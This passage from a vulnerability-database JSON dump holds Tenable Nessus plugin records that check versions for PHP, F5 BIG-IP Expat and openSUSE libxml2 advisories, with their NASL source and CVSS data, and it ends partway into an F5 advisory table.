get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^7(\\.1)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^7\\.1\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 7.1.x\", port);\n\nfix = \"7.1.11\";\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-17T19:18:49", "bulletinFamily": "scanner", "description": "According to its banner, the version of PHP running on the remote \nweb server is 7.0.x prior to 7.0.25. It is, therefore, affected by \nmultiple vulnerabilities.", "modified": "2019-11-02T00:00:00", "id": "PHP_7_0_25.NASL", "href": "https://www.tenable.com/plugins/nessus/104632", "published": "2017-11-16T00:00:00", "title": "PHP 7.0.x < 7.0.25 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104632);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2016-1283\", \"CVE-2017-16642\");\n script_bugtraq_id(79825, 101745);\n\n script_name(english:\"PHP 7.0.x < 7.0.25 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of PHP running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote \nweb server is 7.0.x prior to 7.0.25. It is, therefore, affected by \nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-7.php#7.0.25\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 7.0.25 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1283\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^7(\\.0)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^7\\.0\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 7.0.x\", port);\n\nfix = \"7.0.25\";\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-17T19:18:48", "bulletinFamily": "scanner", "description": "According to its banner, the version of PHP running on the remote \nweb server is 5.6.x prior to 5.6.32. It is, therefore, affected by \nmultiple vulnerabilities.", "modified": "2019-11-02T00:00:00", "id": "PHP_5_6_32.NASL", "href": "https://www.tenable.com/plugins/nessus/104631", "published": "2017-11-16T00:00:00", "title": "PHP 5.6.x < 5.6.32 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104631);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2016-1283\", \"CVE-2017-16642\");\n script_bugtraq_id(79825, 101745);\n\n script_name(english:\"PHP 5.6.x < 5.6.32 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of PHP running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote \nweb server is 5.6.x prior to 5.6.32. It is, therefore, affected by \nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/ChangeLog-5.php#5.6.32\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.6.32 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1283\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.6)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.6\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.6.x\", port);\n\nfix = \"5.6.32\";\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:26:23", "bulletinFamily": "scanner", "description": "An out-of-bounds read flaw was found in the way Expat processed\ncertain input. A remote attacker could send specially crafted XML\nthat, when parsed by an application using the Expat library, would\ncause that application to crash or, possibly, execute arbitrary code\nwith the permission of the user running the\napplication.(CVE-2016-0718)\n\nImpact\n\nA remote attacker could send specially crafted XML which, when parsed\nby an application using the Expat library, would cause that\napplication to stop responding orpossiblyrun arbitrary code with the\npermission of the user running the application.\n\nBIG-IP ASM control plane\n\nAn authenticated user with the relevant privileges, such as Web\nApplication Security Editor,can exploit the vulnerability and gain\nfull control of the system.\n\nbig3d/gtmd\n\nThe big3d / gtmd processes may be exposed to this vulnerability over\nthe management port and self IP addresses when the Port Lockdown\nsetting is set to Default , All , or Custom with TCP port 4353\nincluded. The impact for the big3d process is a temporary disruption\nin the communicationbetween peer systems until the system\nautomatically restarts the big3d process.", "modified": "2019-11-02T00:00:00", "id": "F5_BIGIP_SOL52320548.NASL", "href": "https://www.tenable.com/plugins/nessus/103313", "published": "2017-09-19T00:00:00", "title": "F5 Networks BIG-IP : Expat vulnerability (K52320548)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K52320548.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103313);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/01/04 10:03:41\");\n\n script_cve_id(\"CVE-2016-0718\");\n\n script_name(english:\"F5 Networks BIG-IP : Expat vulnerability (K52320548)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An out-of-bounds read flaw was found in the way Expat processed\ncertain input. A remote attacker could send specially crafted XML\nthat, when parsed by an application using the Expat library, would\ncause that application to crash or, possibly, execute arbitrary code\nwith the permission of the user running the\napplication.(CVE-2016-0718)\n\nImpact\n\nA remote attacker could send specially crafted XML which, when parsed\nby an application using the Expat library, would cause that\napplication to stop responding orpossiblyrun arbitrary code with the\npermission of the user running the application.\n\nBIG-IP ASM control plane\n\nAn authenticated user with the relevant privileges, such as Web\nApplication Security Editor,can exploit the vulnerability and gain\nfull control of the system.\n\nbig3d/gtmd\n\nThe big3d / gtmd processes may be exposed to this vulnerability over\nthe management port and self IP addresses when the Port Lockdown\nsetting is set to Default , All , or Custom with TCP port 4353\nincluded. The impact for the big3d process is a temporary disruption\nin the communicationbetween peer systems until the system\nautomatically restarts the big3d process.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K52320548\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K52320548.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K52320548\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.5.7\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.3.2\",\"11.5.7\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:01:56", "bulletinFamily": "scanner", "description": "This update for libxml2 fixes the following issues :\n\n - CVE-2017-9047, CVE-2017-9048: The function\n xmlSnprintfElementContent in valid.c was vulnerable to a\n stack-based buffer overflow (bsc#1039063, bsc#1039064)\n\n - CVE-2017-9049: The function xmlDictComputeFastKey in\n dict.c was vulnerable to a heap-based buffer over-read.\n (bsc#1039066)\n\n - CVE-2017-9050: The function xmlDictAddString was\n vulnerable to a heap-based buffer over-read\n (bsc#1039661)\n\n - CVE-2016-1839: heap-based buffer overflow\n (xmlDictAddString func) (bnc#1039069)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2017-663.NASL", "href": "https://www.tenable.com/plugins/nessus/100708", "published": "2017-06-09T00:00:00", "title": "openSUSE Security Update : libxml2 (openSUSE-2017-663)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-663.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100708);\n script_version(\"3.3\");\n script_cvs_date(\"Date: 2019/04/10 16:10:18\");\n\n script_cve_id(\"CVE-2016-1839\", \"CVE-2017-9047\", \"CVE-2017-9048\", \"CVE-2017-9049\", \"CVE-2017-9050\");\n\n script_name(english:\"openSUSE Security Update : libxml2 (openSUSE-2017-663)\");\n script_summary(english:\"Check for the openSUSE-2017-663 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libxml2 fixes the following issues :\n\n - CVE-2017-9047, CVE-2017-9048: The function\n xmlSnprintfElementContent in valid.c was vulnerable to a\n stack-based buffer overflow (bsc#1039063, bsc#1039064)\n\n - CVE-2017-9049: The function xmlDictComputeFastKey in\n dict.c was vulnerable to a heap-based buffer over-read.\n (bsc#1039066)\n\n - CVE-2017-9050: The function xmlDictAddString was\n vulnerable to a heap-based buffer over-read\n (bsc#1039661)\n\n - CVE-2016-1839: heap-based buffer overflow\n (xmlDictAddString func) (bnc#1039069)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039069\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039661\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=981114\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-libxml2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-2-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-2-debuginfo-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-debugsource-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-devel-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-tools-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-tools-debuginfo-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"python-libxml2-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"python-libxml2-debuginfo-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"python-libxml2-debugsource-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libxml2-2-32bit-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-32bit-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libxml2-devel-32bit-2.9.4-5.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2-2 / libxml2-2-32bit / libxml2-2-debuginfo / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "f5": [{"lastseen": "2019-12-08T11:26:39", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned IDs 630446 and 674189 (BIG-IP) and ID 677266 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H52320548 on the **Diagnostics** > **Identified** > **High** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP AAM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP AFM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP Analytics | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP APM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP ASM | 13.0.0 